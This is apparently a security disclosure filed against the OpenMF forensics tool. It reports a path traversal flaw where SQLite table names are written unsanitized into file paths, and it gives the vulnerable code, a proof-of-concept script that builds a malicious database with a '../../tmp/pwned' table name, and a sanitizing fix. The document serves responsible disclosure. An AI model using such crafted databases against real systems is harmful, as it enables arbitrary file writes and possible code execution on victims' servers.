Security: Path Traversal via SQLite table names

[imfht]

CWE-22: scripts/file_helper.py uses SQLite table names from sqlite_master directly in open() paths (lines 40, 57). A malicious .db file with table named ../../tmp/evil writes files outside the output directory. Fix: sanitize table names with os.path.basename().

[imfht]

Vulnerability Report: Path Traversal via Malicious SQLite Table Names

Summary

When processing uploaded SQLite database files, OpenMF reads table names from sqlite_master and uses them directly in file paths for open() calls. Since SQLite allows arbitrary characters in table names (including ../), an attacker can craft a malicious .db file that writes files outside the intended output directory.

Affected File

scripts/file_helper.py, lines 40 and 57

Vulnerable Code

# scripts/file_helper.py, line 33-40 (TSV conversion)
for table_name in tables:
    table = table_name['name']  # From sqlite_master — can contain ../../
    # ...
    tsv_file = open(tsv_file_path + '/' + table + '.tsv', 'w+')  # PATH TRAVERSAL

# scripts/file_helper.py, line 54-57 (JSON conversion)
for table_name in tables:
    table = table_name['name']
    # ...
    json_file = open(json_file_path + '/' + table + '.json', 'a')  # PATH TRAVERSAL

table_name['name'] comes from SELECT name FROM sqlite_master WHERE type='table'. SQLite allows table names like ../../tmp/evil which resolves to paths outside the output directory.

Impact

• CWE-22 (Path Traversal)
• CVSS 3.1: 7.5 (High)
• Attack scenario: Forensic analyst uploads a device extraction (.db file) provided by a suspect. The malicious database contains tables with traversal names.
• Attacker can:
  • Write files to arbitrary locations on the forensics server
  • Content is controlled (table data becomes file content)
  • Potential RCE via cron jobs, SSH keys, or web shells

Proof of Concept

import sqlite3

# Create a malicious SQLite database
conn = sqlite3.connect('malicious.db')
cursor = conn.cursor()

# Table name contains path traversal
cursor.execute('CREATE TABLE "../../tmp/pwned" (data TEXT)')
cursor.execute('INSERT INTO "../../tmp/pwned" VALUES ("attacker controlled content")')
conn.commit()
conn.close()

# When OpenMF processes this .db file with convert_to_tsv(db, '/app/data/case1/tsv/'):
#   open('/app/data/case1/tsv/../../tmp/pwned.tsv', 'w+')
#   Resolves to: /app/data/tmp/pwned.tsv (file written outside intended directory!)

Recommended Fix

Sanitize table names before using them in file paths:

import os
import re

def sanitize_table_name(name):
    """Remove path separators and traversal sequences from table names."""
    # Strip directory components
    safe = os.path.basename(name)
    # Only allow alphanumeric, underscore, hyphen
    safe = re.sub(r'[^a-zA-Z0-9_\-]', '_', safe)
    if not safe:
        safe = 'unnamed_table'
    return safe

# Usage:
for table_name in tables:
    table = sanitize_table_name(table_name['name'])
    tsv_file = open(os.path.join(tsv_file_path, table + '.tsv'), 'w+')

Discovery

Found via automated SAST with taint analysis (source: sqlite_master query result → sink: open()). Verified with end-to-end PoC that successfully writes files outside the output directory.